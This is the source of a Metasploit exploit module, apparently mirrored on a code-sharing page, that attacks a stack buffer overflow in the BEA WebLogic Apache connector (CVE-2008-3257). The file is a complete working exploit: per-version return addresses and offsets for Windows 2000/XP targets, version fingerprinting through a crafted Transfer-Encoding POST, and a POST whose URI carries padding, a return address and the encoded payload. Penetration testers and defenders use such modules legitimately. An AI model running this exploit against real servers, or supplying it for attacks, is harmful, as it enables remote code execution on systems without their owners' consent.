Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/bea_weblogic_post_bof.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  HttpFingerprint = { :pattern => [ /Apache/ ] }

10


11
  include Msf::Exploit::Remote::HttpClient

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a stack based buffer overflow in the BEA

20
          Weblogic Apache plugin.

21


22
          The connector fails to properly handle specially crafted HTTP POST

23
          requests, resulting a buffer overflow due to the insecure usage

24
          of sprintf.  Currently, this module works over Windows systems without DEP,

25
          and has been tested with Windows 2000 / XP.

26


27
          In addition, the Weblogic Apache plugin version is fingerprinted with a POST

28
          request containing a specially crafted Transfer-Encoding header.

29
        },

30
        'Author' => [

31
          'KingCope', # Vulnerability Discovery and PoC

32
          'juan vazquez', # Metasploit Module

33
        ],

34
        'References' => [

35
          [ 'CVE', '2008-3257' ],

36
          [ 'OSVDB', '47096' ],

37
          [ 'BID', '30273' ]

38
        ],

39
        'DefaultOptions' => {

40
          'EXITFUNC' => 'process',

41
        },

42
        'Privileged' => true,

43
        'Platform' => 'win',

44
        'Payload' => {

45
          'Space' => 4000,

46
          'BadChars' => "\x00\x0d\x0a\x3f"

47
        },

48
        'Targets' => [

49
          [ 'Automatic', {} ],

50
          [

51
            'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',

52
            {

53
              'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so

54
              'Offset' => 4102

55
            }

56
          ],

57
          [

58
            'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',

59
            {

60
              'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so

61
              'Offset' => 4102

62
            }

63
          ],

64
          [

65
            'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',

66
            {

67
              'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so

68
              'Offset' => 4102

69
            }

70
          ]

71
        ],

72
        'DisclosureDate' => '2008-07-17',

73
        'DefaultTarget' => 0,

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81


82
    register_options(

83
      [

84
        OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),

85
      ]

86
    )

87
  end

88


89
  def check

90
    fingerprint = fingerprint_mod_wl

91
    print_status "#{rhost}:#{rport} - #{fingerprint}"

92


93
    case fingerprint

94
    when /Version found/

95
      return Exploit::CheckCode::Appears

96
    when /BEA WebLogic connector vulnerable/

97
      return Exploit::CheckCode::Appears

98
    when /BEA WebLogic connector undefined/

99
      return Exploit::CheckCode::Detected

100
    when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/

101
      return Exploit::CheckCode::Safe

102
    end

103
  end

104


105
  def exploit

106
    # Autodetect BEA mod_wl version

107
    my_target = get_target

108


109
    # Avoid the attack if the victim doesn't have the same setup we're targeting

110
    if my_target.nil?

111
      print_error("BEA mod_weblogic not supported")

112
      return

113
    end

114


115
    uri = normalize_uri(target_uri.path)

116
    sploit = rand_text_alphanumeric(my_target['Offset'] - uri.length)

117
    sploit << [my_target.ret].pack("V")

118
    sploit << payload.encoded

119


120
    send_request_cgi({

121
      'method' => 'POST',

122
      'uri' => "#{uri} #{sploit}",

123
    })

124


125
    handler

126
  end

127


128
  def get_target

129
    return target if target.name != 'Automatic'

130


131
    fingerprint = fingerprint_mod_wl

132


133
    case fingerprint

134
    when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/

135
      return targets[1]

136
    when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/

137
      return targets[2]

138
    when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/

139
      return targets[3]

140
    else

141
      return nil

142
    end

143
  end

144


145
  def fingerprint_mod_wl

146
    my_data = rand_text_alpha(rand(5) + 8)

147
    res = send_request_cgi(

148
      {

149
        'method' => 'POST',

150
        'uri' => normalize_uri(target_uri.path),

151
        'headers' =>

152
          {

153
            'Transfer-Encoding' => my_data

154
          },

155
        'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",

156
      }

157
    )

158


159
    if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/

160
      # BEA WebLogic 8.1 SP6 - mod_wl_20.so

161
      case res.body

162
      when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)

163
        return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"

164
      # BEA WebLogic 8.1 SP5 - mod_wl_20.so

165
      when (/Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)

166
        return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"

167
      when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)

168
        return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"

169
      # Check for dates prior to patch release

170
      when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/

171
        build_date = Date.parse($1)

172
        if build_date <= Date.parse("Jul 28 2008")

173
          return "BEA WebLogic connector vulnerable"

174
        else

175
          return "BEA WebLogic connector not vulnerable"

176
        end

177
      else

178
        return "BEA WebLogic connector undefined"

179
      end

180
    end

181


182
    return "BEA WebLogic connector not found"

183
  end

184
end

185


186